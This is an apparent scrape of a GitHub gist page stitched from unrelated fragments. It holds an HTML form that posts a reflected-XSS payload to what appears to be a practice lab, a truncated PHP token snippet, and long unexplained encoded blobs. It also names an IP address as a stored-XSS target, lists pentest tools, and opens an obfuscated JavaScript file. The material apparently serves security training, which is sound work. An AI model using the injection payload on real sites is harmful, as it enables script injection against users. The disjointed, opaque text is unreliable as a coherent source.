Skip to content

Instantly share code, notes, and snippets.

<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://hackxpert.com/RXSS/POST/20.php"><table><tr><td>say</td><td><input type="text" value="Hi" name="say"></td></tr>
<tr><td>hidden</td><td><input type="text" value="--><script>alert()</script>" name="hidden"></td></tr>
</table><input type="submit" value="http://hackxpert.com/RXSS/POST/20.php"></form></html>
<?php
session_start();
include 'instructions.php';
if (empty($_SESSION['token'])) {
$_SESSION['token'] = bin2hex(random_bytes(32));
}
$token = $_SESSION['token'];
JJNEERCFKNBUUR2SINDESU2DJJGEESSUJVHEWRKKIZDVMTKOINEUSNBSIRDVKMSOJFMVURKHJZBFKSKSJFCTEVKTKZFTKQSVLFLEGRKKLEZFMT2VLJLUYSSHIZFVIU2DJNLEYVKPK5FU2SSWIRDE2VSLJBEU4TKUI5KEGT2JLJGUKT2UGJGUUUSFIU3FMU2WJM2UKVSVKNJU6SSWINLE6V2DKZFUCWSVJFKFEVSHJJGUKQ2NLJKEUNKFIZGVEU2HJFDEWVKFKZJUQSS2IVCUSVKKGVEFKNSRHU6T2PI=
3333333633333338333333373333333433333337333333343333333733333330333333373333333333333333333633313333333233363336333333323336333633333337333333373333333733333337333333373333333733333332333633353333333733333335333333363333333433333336333333353333333633363334333333373333333933333332333633353333333633333333333333363336333633333336333633343333333233363336333333363333333333333336333633363333333733333335333333373333333233333337333333333333333633333335333333323336333633333337333333353333333633363335333333363333333333333336333633333333333633333335333333323336333433333337333333323333333633333331333333373333333433333337333333333333333233363334333333363333333233333337333333353333333633333337333333323336333433333336333333323333333633363336333333373333333533333336333633353333333733333334333333373333333933333332333633343333333633333337333333373333333533333336333333393333333633333334333333363333333533333332333633363333333333363336333333363333333333333336333633363333333733333335333333373333333033333336333633363333333633363335
Servers
---------------------------
XSS
---------------------------
http://23.239.9.22/cheeseBlog Basic stored XSS on homepage
Solution:
We can make this file beautiful and searchable if this error is corrected: No commas found in this CSV file in line 0.
nmap
nikto
wireshark
hping3
dnsmap
john
ettercap
netcat
dotdotpwn
recon-ng
@The-XSS-Rat
The-XSS-Rat / couponCodeObfuscated.js
Created May 10, 2021 23:34
couponCodeObfuscated.js
var _0x19c2=['y2fJAgvmzw5NDgG','uwvQuxe','ChjVCeHVB2TZ','rJjpO','vvL1Bhm','yunVCuS','set','vu5uwK8','sKjoEfq','childNodes','RSZOA','DfzMyw4','suflr0K','y2XHC3m','CM91svm','getRootNode','tM8Gy29UDMvYC2LVBIbMCM9Tia','C2v0','dir','easing','hasClass','width:60%;top:1%','AVcin','Dgv4Da','eCzau','prototype','NMcrw','ZHZhc','z2v0rwXLBwvUDhncEunSyxnZtMfTzq','yutlX','checkOn','AxnjBw1LzgLHDgvqCM9WywDHDgLVBLn0B3bWzwq','phuBG','CgfNzvLpzMzZzxq','Aw5SAw5LlwjSB2nR','DgHLBG','z0nerxy','eWFaH','CwHytLu','eZwYo','z1v1DKO','BwvZC2fNzq','round','oEVje','vgzXChy','AgfUzgXL','GvtMe','Bg9JAW','hdpuX','SAqPP','BNrO','zlvLZ','B2jQzwn0','val','yxv0BW','hasContent','y2HLy2TLza','Dw5PCxvL','ANnVBNbdywXSyMfJAW','HPhQF','yMfJA2DYB3vUzenSAxa','cssNumber','xxFUw','inArray','rNrfCey','y29UDgfPBNm','uHmlN','CxnH','Eu1bA1y','C29YDerLDgfJAgvK','zML4zwq','EKjNC0y','DgLJAW','filters','isArray','visible','y2XVBMvoB2rL','zM9JDxnPBG','overflowY','tKHcEfK','y1jKB3y','origType','z2v0qM91BMrPBMDdBgLLBNrszwn0','C29YDfn0ywjSzq','AxnytuXeB2m','vhLiD0O',